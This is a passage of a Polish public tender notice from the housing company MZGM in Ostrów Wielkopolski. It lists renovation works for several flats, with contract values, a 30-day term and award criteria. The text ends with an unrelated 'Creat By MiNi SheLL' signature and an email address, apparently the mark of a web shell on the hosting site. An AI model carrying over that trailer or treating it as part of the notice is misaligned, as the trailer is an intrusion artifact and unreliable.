                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część nr 4. : wykonanie remontu lokali mieszkalnych będących w zasobach MZGM  Spółka z o.o w Ostrowie Wielkopolskim :

4.1.Remont lokalu mieszkalnego  przy ul. Wolności 22/14A będącego w zasobach MZGM Spółka z o.o.  w Ostrowie Wielkopolskim w zakresie prac obejmujących m.in.  :                                    - demontaż stelażu i płyt kartonowo-gipsowych z sufitów w lokalu
- zeskrobanie ze ścian tynku strukturalnego, łuszczącej się farby, oczyszczenie szczotką powierzchni tynku z kurzu i pyłu, skucie zmurszałych tynków wraz z wykonaniem nowych                     w II kategorii
- zagruntowanie ścian i sufitów preparatem wzmacniającym struktury tynku np. Ceresit, Atlas,  
- dwukrotne wykonanie wewnętrznych gładzi gipsowych na ścianach i sufitach, 
- dwukrotne malowanie farbą emulsyjną ścian i sufitów,
 - skucie płytek ceramicznych w kuchni,
 - dwukrotne malowanie farbą olejną ścian, lamperia kuchni,
 - demontaż starych wykładzin podłogowych, położenie nowych wykładzin podłogowych PCV o gr.
min: 2,5 mm w kolorze jasno brązowym w pomieszczeniach pokoi, kuchni, przedpokoju, listew przyściennych z polichlorku winylu- w pomieszczeniach pokoi, kuchni, przedpokoju,
- montaż 3 szt. nowych okien, okna z PCV w kolorze białym z profili min. 5  komorowych jako uchylno - rozwierne. Szyby zespolone 4/16/4 o współczynniku przenikania ciepła max U=1,1 W/m? K. Okucia zapewniające regulację za pomocą kluczy imbusowych. Okna winny mieć możliwość stałego przewietrzania pomieszczeń (mikrowentylacja).Wymiana parapetów zewnętrznych na stalowe powlekane w kolorze brązowym, wewnętrznych na wykonane z PCV. Zabudowane materiały powinny posiadać atest PZH, deklarację zgodności z aprobatą techniczną lub normą zharmonizowana wraz z aktualnymi badaniami,
- oczyszczenie drzwi wewnętrznych i wejściowych ze starej farby, dwukrotne dwustronne malowanie  farbą olejną z dwukrotnym szpachlowaniem, oraz wymiana zamków szyldów i klamek,
- demontaż starych przewodów podtynkowych, oraz  puszek podtynkowych;
- wykucie bruzd pod przewody i puszki elektryczne  oraz ułożenie przewodów elektrycznych i puszek instalacyjnych podtynkowych,
- zamurowanie i zatynkowanie bruzd w których ułożono przewody elektryczne,
- łączenie przewodów w puszkach elektrycznych oraz montaż osprzętu elektrycznego,
- wykonanie instalacji gazowej  oraz montaż termy gazowej i kuchenki gazowej 4 palnikowej z piekarnikiem   
- wykonanie próby szczelności instalacji gazu
- demontaż starej instalacji wodno - kanalizacyjnej w kuchni i łazience
- wykonanie rozkuć i bruzd pod  nową instalację wodno - kanalizacyjną
- wykonanie nowej instalacji wodociągowej z rur PP  i instalacji odpływowej z rur PCV
- zamurowanie i zatynkowanie rozkuć i bruzd po robotach instalatorskich
- wykonanie instalacji i montaż wodomierza zw
- położenie płytek ceramicznych na ścianach (do 150 cm wysokości) i podłodze w łazience - montaż armatury sanitarnej w łazience (komplet ustępowy, wanna 140cm, komplet umywalkowy)
oraz zlewozmywaka i baterii zlewozmywakowej w kuchni,
- wymiana popękanych płytek ceramicznych na schodach ( 7 stopni)  wejście do lokalu,
- wywóz i utylizacja gruzu, zgromadzonych w pomieszczeniach rzeczy wraz z wykonaniem prac porządkowych w lokalu.                                                                                                                  

4.2.Remont lokalu mieszkalnego  przy ul. Wrocławskiej 25/3A będącego w zasobach MZGM Spółka z o.o.  w Ostrowie Wielkopolskim w zakresie prac obejmujących m.in.  :
- demontaż drzwi dwuskrzydłowych między pokojami lokalu, zabezpieczenie powstałego otworu wełną mineralną i wypełnienie płytą kartonowo- gipsową
- zeskrobanie ścian z łuszczącej się farby, oczyszczenie szczotka powierzchni tynku z kurzu i pyłu, skucie zmurszałych tynków wraz z wykonaniem nowych w II kategorii,
- zagruntowanie ścian i sufitów preparatem wzmacniającym struktury tynku np. Ceresit, Atlas,                      
- jednokrotne wykonanie wewnętrznych gładzi gipsowych na ścianach i sufitach,
- dwukrotne malowanie farbą emulsyjną ścian i sufitów,
- dwukrotne malowanie farbą olejną ścian, lamperii w  kuchni i łazience
- demontaż starych wykładzin podłogowych, położenie nowych wykładzin podłogowych PCV o gr. min: 2,5 mm w kolorze jasno brązowym w  pokojach, kuchni i łazience, listew przyściennych z polichlorku winylu - w  pokojach, kuchni i łazience,
- oczyszczenie drzwi wewnętrznych ze starej farby, dwukrotne dwustronne malowanie  farbą olejną z dwukrotnym szpachlowaniem oraz wymiana zamków, szyldów i klamek
- montaż 5 szt. nowych okien, okna z PCV w kolorze białym z profili min. 5  komorowych jako uchylno - rozwierne. Szyby zespolone 4/16/4 o współczynniku przenikania ciepła max U=1,1 W/m? K. Okucia zapewniające regulację za pomocą kluczy imbusowych. Okna winny mieć możliwość stałego przewietrzania pomieszczeń (mikrowentylacja).Wymiana parapetów zewnętrznych na stalowe powlekane w kolorze brązowym, wewnętrznych na wykonane z PCV. Zabudowane materiały powinny posiadać atest PZH, deklarację zgodności z aprobatą techniczną lub normą zharmonizowana wraz z aktualnymi badaniami,
- demontaż starych przewodów podtynkowych, oraz  puszek podtynkowych,
- wykucie bruzd pod przewody i puszki elektryczne  oraz ułożenie przewodów elektrycznych i puszek instalacyjnych podtynkowych,
- zamurowanie i zatynkowanie bruzd w których ułożono przewody elektryczne,
- łączenie przewodów w puszkach elektrycznych oraz montaż osprzętu elektrycznego
- demontaż starej instalacji wodno - kanalizacyjnej w kuchni i łazience,
- wykonanie rozkuć i bruzd pod  nową instalację wodno - kanalizacyjną,
- wykonanie nowej instalacji wodociągowej z rur PP  i instalacji odpływowej z rur PCV, - zamurowanie i zatynkowanie rozkuć i bruzd po robotach instalatorskich,
- wykonanie wylewki samopoziomującej w łazience lokalu,
- wykonanie instalacji i montaż wodomierza zw,
- montaż armatury sanitarnej w łazience (komplet ustępowy, komplet natryskowy,  komplet umywalkowy) oraz montaż baterii zlewozmywakowej i zlewozmywaka w kuchni
- montaż bojlera elektrycznego 40L w łazience
- wykonanie instalacji gazowej  oraz montaż kuchenki gazowej 4 palnikowej z piekarnikiem   
- wykonanie próby szczelności instalacji gazu
- wywóz i utylizacja gruzu, zgromadzonych w pomieszczeniach rzeczy wraz z wykonaniem prac porządkowych w lokalu.

4.3.Remont lokalu mieszkalnego  przy ul. Wrocławska 148/3  będącego w zasobach MZGM Spółka z o.o.  w Ostrowie Wielkopolskim w zakresie prac obejmujących m.in.  :                               - zeskrobanie ścian z łuszczącej się farby, oczyszczenie szczotka powierzchni tynku z kurzu i pyłu, skucie zmurszałych tynków wraz z wykonaniem nowych w II kategorii,                                   - zagruntowanie ścian i sufitów preparatem wzmacniającym struktury tynku np. Ceresit, Atlas,  
- jednokrotne wykonanie wewnętrznych gładzi gipsowych na ścianach i sufitach, 
- dwukrotne malowanie farbą emulsyjną ścian i sufitów,
- skucie płytek ceramicznych w kuchni,  
- dwukrotne malowanie farbą olejną ścian, lamperia kuchni,
- demontaż starych wykładzin podłogowych, położenie nowych wykładzin podłogowych PCV o gr.
min: 2,5 mm w kolorze jasno brązowym w pomieszczeniach pokoi, kuchni,  pomieszczeniu w-c,  i korytarzu, listew przyściennych z polichlorku winylu - w pomieszczeniach pokoi, kuchni, pomieszczeniu w-c i korytarzu,
- oczyszczenie drzwi wewnętrznych i wejściowych ze starej farby, dwukrotne dwustronne malowanie  farbą olejną z dwukrotnym szpachlowaniem, oraz wymiana zamków szyldów i klamek,
- montaż skrzydła drzwiowego - drzwi od skrytki,
- demontaż starych przewodów podtynkowych, oraz  puszek podtynkowych,
- wykucie bruzd pod przewody i puszki elektryczne  oraz ułożenie przewodów elektrycznych i puszek instalacyjnych podtynkowych,
- zamurowanie i zatynkowanie bruzd w których ułożono przewody elektryczne,  
- łączenie przewodów w puszkach elektrycznych oraz montaż osprzętu elektrycznego
- wymiana kabiny prysznicowej
- wywóz i utylizacja gruzu, zgromadzonych w pomieszczeniach rzeczy wraz z wykonaniem prac porządkowych w lokalu. <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45210000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  59572.43<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji i rękojmi</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Wykonanie remontów w branży ogólnobudowlanej w budynkach będących w zasobach Miejskiego Zakładu Gospodarki Mieszkaniowej Sp. z o. o. w Ostrowie Wielkopolskim, ul. Harcerska 11/11; ul. Kościuszki 22/5; ul. Broniewskiego 7/15; ul. Staroprzygodzka 104 D/3; ul. Piłsudskiego 63 A/7<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część nr 5: Wykonanie remontu lokali mieszkalnych  będących w zasobach MZGM Sp. z o.o.  w Ostrowie Wlkp.:

5.1. Remont lokalu mieszkalnego przy ul. Broniewskiego 7/15 będącego w zasobach MZGM Sp. z o.o. w Ostrowie Wlkp. w zakresie prac obejmującym m.in.:
- zeskrobaniu ścian z łuszczącej się farby, oczyszczeniu szczotką powierzchni tynku z kurzu i pyłu, skucie zmurszałych tynków,
- zerwanie boazerii,
- zerwanie starych tapet,
- rozebranie posadzki z płytek,
- rozebranie licowania ścian - skucie glazury,
- rozebranie paneli podłogowych,
- ochrona narożników kątownikiem, 
- zagruntowaniu ścian i sufitów preparatem wzmacniającym strukturę tynku- np: Ceresit, Atlas, Knauf, 
- jednokrotne wykonanie wewnętrznych gładzi gipsowych na ścianach i sufitach,
- dwukrotne malowanie farbą emulsyjną ścian i sufitów,
- dwukrotne malowanie farbą olejną - lamperie,
- wymiana lub naprawa ewentualnych uszkodzeń w stolarce drzwiowej (drzwi wewnętrzne i zewnętrzne),
- oczyszczeniu drzwi wewnętrznych ze starej farby, dwukrotne dwustronne malowanie drzwi farbą olejną z dwukrotnym szpachlowaniem,
- dwukrotne malowanie farbą olejną grzejników i rur instalacji c.o.
- demontaż starych wykładzin podłogowych, położenie nowych wykładzin PCV o gr. min: 2,5 mm w kolorze jasno brązowym, położenie listew przyściennych z polichlorku winylu,
- położenie paneli podłogowych laminowanych w klasie ścieralności AC 3, o grubości 7 mm, powierzchnia-struktura drewna, materiał nośny HDF, sposób montażu - pływający, bezklejowy, na podkładzie, położenie listew wykańczających  z MDF,
- wywóz i utylizacja gruzu, zgromadzonych w pomieszczeniach rzeczy wraz z wykonaniem prac porządkowych w lokalu,
5.2. Remont lokalu mieszkalnego przy ul. Harcerskiej 11/11 będącego w zasobach MZGM Sp. z o.o. w Ostrowie Wlkp. w zakresie prac obejmującym m.in.:
- zeskrobaniu ścian z łuszczącej się farby, oczyszczeniu szczotką powierzchni tynku z kurzu i pyłu, skucie zmurszałych tynków,
- zerwanie starych tapet,
- rozebranie posadzki z płytek,
- rozebranie licowania ścian - skucie glazury,
- ochrona narożników kątownikiem, 
- zagruntowaniu ścian i sufitów preparatem wzmacniającym strukturę tynku- np: Ceresit, Atlas, Knauf, 
- jednokrotne wykonanie wewnętrznych gładzi gipsowych na ścianach i sufitach,
- dwukrotne malowanie farbą emulsyjną ścian i sufitów,
- dwukrotne malowanie farbą olejną - lamperie,
- wymiana lub naprawa ewentualnych uszkodzeń w stolarce drzwiowej (drzwi wewnętrzne i zewnętrzne),
- oczyszczeniu drzwi wewnętrznych ze starej farby, dwukrotne dwustronne malowanie drzwi farbą olejną z dwukrotnym szpachlowaniem,
- dwukrotne malowanie farbą olejną grzejników i rur instalacji c.o.
- demontaż starych wykładzin podłogowych, położenie nowych wykładzin PCV o gr. min: 2,5 mm w kolorze jasno brązowym, położenie listew przyściennych z polichlorku winylu,
- położenie paneli podłogowych laminowanych w klasie ścieralności AC 3, o grubości 7 mm, powierzchnia-struktura drewna, materiał nośny HDF, sposób montażu - pływający, bezklejowy, na podkładzie, położenie listew wykańczających  z MDF,
- wywóz i utylizacja gruzu, zgromadzonych w pomieszczeniach rzeczy wraz z wykonaniem prac porządkowych w lokalu,
5.3. Remont lokalu mieszkalnego przy ul. Kościuszki 22/5 będącego w zasobach MZGM Sp. z o.o. w Ostrowie Wlkp. w zakresie prac obejmującym m.in.:
- zeskrobaniu ścian z łuszczącej się farby, oczyszczeniu szczotką powierzchni tynku z kurzu i pyłu, skucie zmurszałych tynków,
- rozebranie wykładziny z PCV,
- ochrona narożników kątownikiem, 
- zagruntowaniu ścian i sufitów preparatem wzmacniającym strukturę tynku- np: Ceresit, Atlas, Knauf, 
- jednokrotne wykonanie wewnętrznych gładzi gipsowych na ścianach i sufitach,
- dwukrotne malowanie farbą emulsyjną ścian i sufitów,
- dwukrotne malowanie farbą olejną - lamperie,
- wymiana lub naprawa ewentualnych uszkodzeń w stolarce drzwiowej (drzwi wewnętrzne i zewnętrzne),
- oczyszczeniu drzwi wewnętrznych ze starej farby, dwukrotne dwustronne malowanie drzwi farbą olejną z dwukrotnym szpachlowaniem,
- dwukrotne malowanie farbą olejną grzejników i rur instalacji c.o.
- demontaż starych wykładzin podłogowych, położenie nowych wykładzin PCV o gr. min: 2,5 mm w kolorze jasno brązowym, położenie listew przyściennych z polichlorku winylu,
- położenie paneli podłogowych laminowanych w klasie ścieralności AC 3, o grubości 7 mm, powierzchnia-struktura drewna, materiał nośny HDF, sposób montażu - pływający, bezklejowy, na podkładzie, położenie listew wykańczających  z MDF,
- montaż nowych okien - okna wykonać z PCW w kolorze białym z profili min. 5 komorowych jako uchylno-rozwierne. Szyby zespolone 4/16/4 o współczynniku przenikania ciepła max U=1,1 W/m2K. Okucia zapewniające regulację za pomocą kluczy imbusowych. Okna winny mieć możliwość stałego przewietrzania pomieszczeń (mikrowentylacja). Wymiana parapetów zewnętrznych na stalowe powlekane w kolorze brązowym, wewnętrznych na wykonane z PCV. Zabudowane materiały powinny posiadać atest PZH, deklarację zgodności z aprobatą techniczną lub normą zharmonizowaną wraz z aktualnymi badaniami,
- wykonanie obróbek przy dwóch oknach - zewnętrznych  oraz wewnętrznych z płyt G-K,
- wywóz i utylizacja gruzu, zgromadzonych w pomieszczeniach rzeczy wraz z wykonaniem prac porządkowych w lokalu,
5.4. Remont lokalu mieszkalnego przy ul. Piłsudskiego 63 A/7 będącego w zasobach MZGM Sp. z o.o. w Ostrowie Wlkp. w zakresie prac obejmującym m.in.:
- odgrzybianie ścian metodą smarowania,
- zeskrobaniu ścian z łuszczącej się farby, oczyszczeniu szczotką powierzchni tynku z kurzu i pyłu, skucie zmurszałych tynków,
- zerwanie boazerii,
- zerwanie starych tapet,
- rozebranie posadzki z płytek,
- rozebranie licowania ścian - skucie glazury,
- ochrona narożników kątownikiem, 
- zagruntowaniu ścian i sufitów preparatem wzmacniającym strukturę tynku- np: Ceresit, Atlas, Knauf, 
- jednokrotne wykonanie wewnętrznych gładzi gipsowych na ścianach i sufitach,
- dwukrotne malowanie farbą emulsyjną ścian i sufitów,
- dwukrotne malowanie farbą olejną - lamperie,
- wymiana lub naprawa ewentualnych uszkodzeń w stolarce drzwiowej (drzwi wewnętrzne i zewnętrzne),
- oczyszczeniu drzwi wewnętrznych ze starej farby, dwukrotne dwustronne malowanie drzwi farbą olejną z dwukrotnym szpachlowaniem,
- dwukrotne malowanie farbą olejną grzejników i rur instalacji c.o.
- demontaż starych wykładzin podłogowych, położenie nowych wykładzin PCV o gr. min: 2,5 mm w kolorze jasno brązowym, położenie listew przyściennych z polichlorku winylu,
- położenie paneli podłogowych laminowanych w klasie ścieralności AC 3, o grubości 7 mm, powierzchnia-struktura drewna, materiał nośny HDF, sposób montażu - pływający, bezklejowy, na podkładzie, położenie listew wykańczających  z MDF,
- montaż drzwi łazienkowych oraz wewnętrznych wraz z ościeżnicą, klamkami, szyldami wyposażonych w kratkę wentylacyjną nie mniejszą niż 0,022 m2 spełniającą normy, w kolorystyce uzgodnionej z zamawiającym - producent np. Porta DRE
- wywóz i utylizacja gruzu, zgromadzonych w pomieszczeniach rzeczy wraz z wykonaniem prac porządkowych w lokalu,
5.5. Remont lokalu mieszkalnego przy ul. Staroprzygodzkiej 104 D/3 będącego w zasobach MZGM Sp. z o.o. w Ostrowie Wlkp. w zakresie prac obejmującym m.in.:
- zeskrobaniu ścian z łuszczącej się farby, oczyszczeniu szczotką powierzchni tynku z kurzu i pyłu, skucie zmurszałych tynków,
- rozebranie wykładzin podłogowych i paneli podłogowych,
- zerwanie starych tapet,
- wykonanie nowej wylewki betonowej podłogi wraz z zbrojeniem siatką stalową, 
- ochrona narożników kątownikiem, 
- zagruntowaniu ścian i sufitów preparatem wzmacniającym strukturę tynku- np: Ceresit, Atlas, Knauf, 
- jednokrotne wykonanie wewnętrznych gładzi gipsowych na ścianach i sufitach,
- dwukrotne malowanie farbą emulsyjną ścian i sufitów,
- dwukrotne malowanie farbą olejną - lamperie,
- wymiana lub naprawa ewentualnych uszkodzeń w stolarce drzwiowej (drzwi wewnętrzne i zewnętrzne),
- oczyszczeniu drzwi wewnętrznych ze starej farby, dwukrotne dwustronne malowanie drzwi farbą olejną z dwukrotnym szpachlowaniem,
- dwukrotne malowanie farbą olejną grzejników i rur instalacji c.o.
- demontaż starych wykładzin podłogowych, położenie nowych wykładzin PCV o gr. min: 2,5 mm w kolorze jasno brązowym, położenie listew przyściennych z polichlorku winylu,
- położenie paneli podłogowych laminowanych w klasie ścieralności AC 3, o grubości 7 mm, powierzchnia-struktura drewna, materiał nośny HDF, sposób montażu - pływający, bezklejowy, na podkładzie, położenie listew wykańczających  z MDF,
- wywóz i utylizacja gruzu, zgromadzonych w pomieszczeniach rzeczy wraz z wykonaniem prac porządkowych w lokalu, <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45210000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  47610.52<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji i rękojmi</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com